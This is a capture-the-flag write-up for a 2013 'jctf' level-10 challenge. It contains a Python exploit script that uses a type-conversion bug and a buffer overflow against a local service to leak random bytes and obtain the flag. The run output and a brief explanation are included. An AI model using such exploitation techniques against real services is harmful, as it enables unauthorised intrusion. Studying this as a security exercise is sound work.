binary
# jctf 2013 lv10 exploit
from socket import socket, AF_INET, SOCK_STREAM
import time

ip = "127.0.0.1"
port = 31333

s = socket(AF_INET, SOCK_STREAM)
s.connect((ip, port))
print(s.recv(1024))
s.send(b"257\n")           # number: type conversion (257 = 0x101)
print(s.recv(1024))
s.send(b"134525080\n")     # value: random[16] (134525080 = 0x0804b098)
print(s.recv(1024))
s.send(b"7\n")             # exit the menu
print(s.recv(1024))
s.send(b"A" * 19 + b"\n")  # buff ~ 19 bytes of "A", ~ 20 with the newline
time.sleep(1)              # give the service time to send the whole reply
canary = s.recv(1024)
print(canary)
canary = canary[164:]      # drop the first 164 bytes, keeping the leaked bytes and the prompt after them
print(canary)
s.send(canary)             # send the leaked bytes back
print(s.recv(1024))
The above is the exploit.
root@ubuntu:/home/sweetchip/Desktop/cyber/jctf# python ./a.py
Get me your information.
1. Age
2. Sex
3. Birth
4. Favorite number
5. Reversing skill
6. Exploitaion skill
7. Exit this menu
INPUT:
Value?
INPUT:
add_value(): added
Get me your information.
1. Age
2. Sex
3. Birth
4. Favorite number
5. Reversing skill
6. Exploitaion skill
7. Exit this menu
INPUT:
Thanks for the info.
1: number - 00000101, value - 0804b098
Are you trying to buffer overflow?!:
INPUT: [1] error: the buffer is too long. [36][AAAAAAAAAAAAAAAAAAA
ǖ>丒𢡊ඝ
Input the random bytes, if correct, you'll get the flag!
INPUT:
ǖ>丒𢡊ඝ
Input the random bytes, if correct, you'll get the flag!
INPUT:
Oh, wow! Congrats! The key is: this is flag zz << This is a flag I made up temporarily.
INPUT:
root@ubuntu:/home/sweetchip/Desktop/cyber/jctf#
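This was originally a local challenge, but I just ran it as a remote service and exploited it that way.
This challenge may have several solutions, but this time I solved it by using a type conversion buffer overflow to leak the random value.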